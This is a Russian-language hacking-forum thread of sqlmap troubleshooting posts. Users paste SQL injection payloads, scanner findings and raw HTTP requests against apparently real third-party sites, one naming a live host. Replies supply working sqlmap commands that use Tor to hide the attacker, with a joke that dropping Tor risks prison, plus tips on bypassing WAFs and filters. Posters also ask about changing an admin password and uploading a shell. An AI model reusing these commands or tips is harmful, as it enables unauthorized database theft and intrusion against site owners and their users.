Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,563
    Reputations:
    40
    тут файл с куками и прочим -p "service" --dbs --time-sec 5 --risk=3 --level=5
    попробуй так, или установи старую версию sqlmap
     
  2. NineCent

    NineCent New Member

    Joined:
    4 Nov 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Попробовал результат лучше но, теперь сервак выкидывает. Что можно далее предпринять?

    [17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable
    it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
    [17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive
    [17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
    [17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [17:34:27] [WARNING] false positive or unexploitable injection point detected
    [17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable
    [17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
     
  3. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    в мапе --current-db ,вроде как текущая база,но что значит текущая? бд домена где скуля или как?
     
  4. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    да
     
    hashfinderboss likes this.
  5. ex3x1

    ex3x1 New Member

    Joined:
    14 Sep 2019
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Приветствую. Слепая инъекция в личном кабинете на сайте в get запросе, поэтому использую --cookie, скульмап выдает следующее:

    Code:
    [WARNING] provided parameter 'utm_source' appears to be 'base64' encoded
    [WARNING] provided parameter 'laravel_session' appears to be 'base64' encoded
    Cookie parameter 'XSRF-TOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
    Независимо от того выберу я y или N - сыпется 500 ошибка, и мап ни чего не находит. Пересканивал акунетиксом раз 5, он постоянно детектит скулю и по логам получает 200 OK, а не 500 ошибку. Как раскрутить мапом? В чем проблема?

    Куки такого вида:

    Code:
    XSRF-TOKEN=eyJpdiI6IkxhNDJjRWk4Um9pWURqTjdzbCtQV1E9PSIsInZhbHVlIjoiRHhoZlk5K1h5YnI3QzQwSVlIZnBydUJcL0xhdGJvdHdYMmNtWDZnaGlOc2RsSnVaM1lCUVg3VnoyK041c2xLaE9ueEVzN2M0aGlQXC9VdGgwS2Vubys1dz09IiwibWFjIjoiNDg3YWIyZjhkYjg0Zjk0ZTk3MDEyZWJkMDAzY2Q1YmE2Yzk3NGYwMDEwNTA4ODM5M2M4NDRjZjdlYjJiZWZmZiJ9   
    
    laravel_session=eyJpdiI6InNZdEV1WVJ0Z1dVaHRnXC82UWZNM21BPT0iLCJ2YWx1ZSI6InFJa3NJVHk3eFh1cDBhaHROZGJrXC80RytQSXBkMFJTSEFRWXBLSVp3STlTdWV1RnBMRHNZOFwvMWltZ2Nvb3pFdCtZVlNTUUVUUEYwNUpNbk5ybXFiTHc9PSIsIm1hYyI6IjA1ZjUxZGEyM2Q5YmIyZWQ3MmVmMjE5N2E0YjZlNWUyNDA5ODgyNGEyNzNmZmRmZTk3Y2RkMjM0NTcyNGVlMjMifQ
     
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    --ignore-code=500 по пробуй
     
    ex3x1 likes this.
  7. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    Помогло? У меня несколько раз прокатывало
     
    ex3x1 likes this.
  8. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    как то можно поменять пароль в админку через мап?
    может быть возможно если есть привлегии и тп?
     
  9. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    Возможно, если есть приведении и тп то можно шел залить и делать все что угодно
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Если инъекция в UPDATE или после ; то можно попробовать.
     
    _________________________
  11. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    я знаю что есть ерор,унион,болеан,таймбасед,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?
     
  12. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Доброго времени всем. При таком запросе:
    sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive
    Получаю название бд. Дальше при такой команде:
    sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables
    Получаю следующее:
    [​IMG]

    Пробовал напрямую делать запрос:
    sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

    Такая же ошибка
    [​IMG]

    Я так понимаю дело в этом?

    [​IMG]

    Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?
    Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

    P.s
    Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.
    Есть предложение на взаимовыгодных условиях.
     
    #1032 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  13. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    279
    Likes Received:
    117
    Reputations:
    26
    UPDATE, это оператор который обновляет столбцы в базе данных.
    mysql.ru/docs/man/UPDATE.html

    Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
     
  14. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Застрял на этом моменте:

    [​IMG]

    Подскажите, что делать дальше?
     
    #1034 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    Искать тамперы
     
    mixer123 likes this.
  16. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться


    например это?
    The vulnerability affects https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW , X-Forwarded-For

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

    Tests performed:
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
    0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218


    Original value: 3iv1i

    HTTP Request
    arrow_drop_up
    GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
    Referer: https://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
    Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
    X-Requested-With: XMLHttpRequest
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: copyfaxes.com
    Connection: Keep-alive
     
  17. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    и это например?буду предельно благодарен за помощь.
    The vulnerability affects https://www.site.com/ , /<s>-<n>-[*]-<n>.html

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    Path Fragment input /<s>-<n>-[*]-<n>.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

    Tests performed:
    volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*3<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*3*9<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*6<26 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE


    Original value: volts-amplifier-and-cd-players

    HTTP Request
    arrow_drop_up
    GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUNL-1517.html HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.site.com/
    Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.site.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
     
  18. ex3x1

    ex3x1 New Member

    Joined:
    14 Sep 2019
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    sqlmap.py -u https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW --headers="X-Forwarded-For: *" --random-agent --tor --tor-type=SOCKS5 --dbs --risk=3 --level=5

    sqlmap.py -u "https://www.site.com/search-110-volts-amplifier-and-cd-players*-1517.html" --random-agent --tor --tor-type=SOCKS5 --dbs --risk=3 --level=5

    P.S. Если есть желание присесть на бутылку, то --tor --tor-type=SOCKS5 можно убрать.
     
  19. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Acunetix выдал такое:
    Code:
    Уязвимость затрагивает https://www.site.com/ , / <s> / <s> / [*] / <s> /
    
    Обнаружено слепым SQL-инъекцией
    
    Детали атаки
    arrow_drop_up
    Вход фрагмента пути / <s> / <s> / [*] / <s> / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
    
    тесты :
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
    0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
    
    
    Первоначальное значение: doe-spiransuchor
    
    HTTP-запрос
    arrow_drop_up
    GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
    Как правильно скормить в sqlmap?
     
  20. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    368
    Likes Received:
    242
    Reputations:
    3
    Точно так же как написали выше, со слепыми может быть ложное срабатывание
     
    rozzet and vladF like this.
Loading...